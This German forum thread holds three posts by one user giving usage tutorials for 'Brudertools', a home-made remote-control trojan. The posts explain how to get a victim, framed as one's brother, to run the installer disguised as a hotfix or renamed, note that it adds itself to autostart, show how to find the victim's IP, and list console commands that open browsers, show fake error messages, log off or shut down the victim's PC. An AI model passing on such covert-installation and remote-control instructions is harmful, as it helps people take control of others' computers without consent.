Ansicht von 3 Beiträgen - 1 bis 3 (von insgesamt 3)
  • Autor
    Beiträge
  • #1344

    nasenbaer
    Teilnehmer

    Tutorial 0.1 für Brudertools-Computerfernsteuerung (ohnenone.rar)

    1. Vorbereitung
    2. Ausführung

    1)
    ·Brudertools ist eine Art Trojaner, daher muss das Opfer erst ein Programm ausführen („Setup.bat“ aus „bt21.rar“; Das Archiv MUSS aber komplett entpackt sein!!!). Dieses kann zum Beispiel als HOTFIX getarnt werden.
    Das Programm trägt sich direkt mal in den Autostart ein… ;)
    ·Nun musst du nur noch auf deinem Rechner die Programme Semp.exe und Ssend.exe ausführen…

    2)
    ·Du solltest nun eine Art Eingabefenster sehen:
    [img]http://image.martinkremers.de/images/php6e3Qus.PNG[/img]
    Hier tippst du nun: „!“ (Ein Ausrufezeichen!)
    Bestätige die Frage mit „Ja“, falls du nicht beenden möchtest…
    Tippe nun die IP deines Opfers ein: (Gleich mehr)
    [img]http://image.martinkremers.de/images/phpXeJJdL.PNG[/img]
    ICH KENNE DIE IP NICHT, ABER DEN COMPUTERNAMEN! (z.B.: Aus der Netzwerkumgebung)
    =>Drücke: Start-Run-„cmd“: Ein schwarzes Fenster öffnet sich-tippe „ping :
    [img]http://image.martinkremers.de/images/php9b0vAx.PNG[/img]
    Du hast nun die IP…

    Das Befehlsfenster öffnet sich wieder, jetzt mit anderer IP. Dies ist die Konsole, mit der du Kommandos an einen anderen Rechner schickst:

    „othbeep!“ =>Ton (Mit oth! ;))
    „comstartXiexploreX-kXwww.keks.de!“
    => IE mit http://www.keks.de im Vollbildmodus starten… ;)
    „othtest!“ => Verbindung? (Mit oth! ;))
    „othende!“ => Trojaner beenden (bis zum nächsten restart)
    „comshutdownX-s!“ => PC runterfahren
    „comlogoff!“ => 3x darfst du raten
    „sayHalloXMausfan!“ => Fehlermeldung, mit „Hallo Mausfan“, Leerzeichen durch „X“ ersetzen, und nie das „!“ vergessen!!!
    [img]http://image.martinkremers.de/images/phpsB6QGx.PNG[/img]
    [img]http://image.martinkremers.de/images/php26a3XE.PNG[/img]

    NB, ich hafte nicht bei Schäden!

    #5719

    nasenbaer
    Teilnehmer

    Eine neue Version und neue Kommandos…
    Brudertools 3.2
    Neue Features und besser versteckter „Trojaner“!

    Diese Version besteht aus 2 exe-Dateien:

    renameit.exe <-Trojaner
    bt32sen6.exe <-Sender/Fernsteuerung

    Die eine Datei, „renameit.exe“ sollte umbenannt und auf den „Feindrechner“ (Der des Bruders) kopiert werden. Einfach noch ausführen und es kann losgehen!
    Beachte, dass sich „bt3.2“ nicht in den Autostart schreiben, bis du es willst!

    Nun führst du bei dir nur noch „bt32sen#.exe“ aus, und es kann losgehen!

    Dir werden alle Kommandos gezeigt, aber mit com kannst du eine ganze Menge mehr anstellen:
    phpCC6dHN.png

    Anmerkungen:
    Das Ersetzen von Leerzeichen durch „X“ entfällt ebenso, wie das „!“ als Abschlußmarke! Die zuletzt eingetippte IP wird in „ip.dat“ gespeichert. Um eine neue IP einzugeben, musst du „ip.dat“ also einfach löschen!
    Nasenbaer, 6.6.2007, für http://www.support-network.info
    Download:
    Im Anhang! (upped on 6.6.2007)

    #5770

    nasenbaer
    Teilnehmer

    Eine neue Version und neue Kommandos…
    Brudertools 3.3
    Neue Features!

    Diese Version besteht aus 3(!) exe-Dateien:

    renameit.exe < -"Trojaner"
    bt33sen2.exe < -Sender/Fernsteuerung
    bt33bat2.exe < -sendet alle Kommandos aus "bat.dat" der Reihe nach

    Die eine Datei, „renameit.exe“ sollte umbenannt und auf den „Feindrechner“ (Der des Bruders) kopiert werden. Einfach noch ausführen und es kann losgehen!
    Beachte, dass sich „bt3.3“ nicht in den Autostart schreiben, bis du es willst!

    Nun führst du bei dir nur noch „bt33sen#.exe“ aus, und es kann losgehen!

    Dir werden viele Kommandos gezeigt, aber mit com kannst du eine ganze Menge mehr anstellen: (com start iexplore … ;) )
    [img]http://image.martinkremers.de/images/phpyqFaZE.PNG[/img]

    Anmerkungen:
    Das Ersetzen von Leerzeichen durch „X“ entfällt ebenso, wie das „!“ als Abschlußmarke! Die zuletzt eingetippte IP wird in „ip.dat“ gespeichert. Um eine neue IP einzugeben, musst du „ip.dat“ also einfach löschen! „bat.dat“ kann mit dem Standard-Editor bearbeitet werden. Die oben stehende Anleitung zur IP-Addressenermittlung gilt natürlich immer noch…☺
    Nasenbaer, 6.6.2007, für http://www.support-network.info
    Download:
    Im Anhang! (9.6.2007)

Ansicht von 3 Beiträgen - 1 bis 3 (von insgesamt 3)

Du musst angemeldet sein, um auf dieses Thema antworten zu können.